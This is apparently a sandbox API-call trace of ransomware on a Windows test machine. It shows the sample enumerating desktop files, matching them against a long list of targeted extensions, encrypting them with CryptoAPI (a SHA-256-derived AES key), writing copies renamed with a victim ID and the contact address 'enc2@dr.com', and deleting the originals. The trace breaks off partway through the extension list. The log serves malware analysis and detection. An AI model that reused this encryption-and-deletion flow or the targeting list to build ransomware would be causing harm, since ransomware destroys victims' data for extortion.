	[0183.819] lstrcmpW (lpString1="FWbkN_RDsIvw.doc", lpString2="..") returned 1
	[0183.819] lstrcmpW (lpString1="FWbkN_RDsIvw.doc", lpString2=".") returned 1
	[0183.819] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\"
	[0183.819] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\", lpString2="FWbkN_RDsIvw.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\FWbkN_RDsIvw.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\FWbkN_RDsIvw.doc"
	[0183.819] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\FWbkN_RDsIvw.doc") returned 59
	[0183.819] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.819] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\FWbkN_RDsIvw.doc", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc") returned 0x3b
	[0183.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.820] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc") returned="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc"
	[0183.820] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc") returned 59
	[0183.820] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.820] StrStrW (lpFirst=".doc", lpSrch=".") returned=".doc"
	[0183.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.821] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".doc") returned=".doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.821] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.821] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.821] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.824] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x4e4f, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x4e4f, lpOverlapped=0x0) returned 1
	[0183.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.830] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0183.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.833] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.833] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.833] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0183.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.833] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x4e4f, dwBufLen=0x4e4f | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x4e50) returned 1
	[0183.834] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.834] RtlMoveMemory (in: Destination=0xfe1fd8, Source=0xfdd180, Length=0x4e4f | out: Destination=0xfe1fd8) 
	[0183.834] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.835] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1fd8*, pdwDataLen=0x18aefc*=0x4e4f, dwBufLen=0x4e50 | out: pbData=0xfe1fd8*, pdwDataLen=0x18aefc*=0x4e50) returned 1
	[0183.835] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.835] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0183.836] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.836] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0183.836] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.836] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0183.836] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.836] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.837] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.837] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.838] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0183.838] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.839] WriteFile (in: hFile=0x390, lpBuffer=0xfe1fd8*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe1fd8*, lpNumberOfBytesWritten=0x18b358*=0x4e50, lpOverlapped=0x0) returned 1
	[0183.843] CloseHandle (hObject=0x390) returned 1
	[0183.844] CloseHandle (hObject=0x388) returned 1
	[0183.844] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc")) returned 1
	[0183.851] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\fwbkn_rdsivw.doc")) returned 0
	[0183.851] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77dfcb50, ftCreationTime.dwHighDateTime=0x1d968a8, ftLastAccessTime.dwLowDateTime=0xee4825d0, ftLastAccessTime.dwHighDateTime=0x1d96b7d, ftLastWriteTime.dwLowDateTime=0xee4825d0, ftLastWriteTime.dwHighDateTime=0x1d96b7d, nFileSizeHigh=0x0, nFileSizeLow=0x183bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="I j43I7a8S3av.png", cAlternateFileName="IJ43I7~1.PNG")) returned 1
	[0183.851] lstrcmpW (lpString1="I j43I7a8S3av.png", lpString2="..") returned 1
	[0183.851] lstrcmpW (lpString1="I j43I7a8S3av.png", lpString2=".") returned 1
	[0183.851] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\"
	[0183.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\", lpString2="I j43I7a8S3av.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\I j43I7a8S3av.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\I j43I7a8S3av.png"
	[0183.851] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\I j43I7a8S3av.png") returned 60
	[0183.851] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.852] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\I j43I7a8S3av.png", cchLength=0x3c | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png") returned 0x3c
	[0183.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.852] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.852] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png") returned="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png"
	[0183.852] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png") returned 60
	[0183.852] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.853] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0183.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.853] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs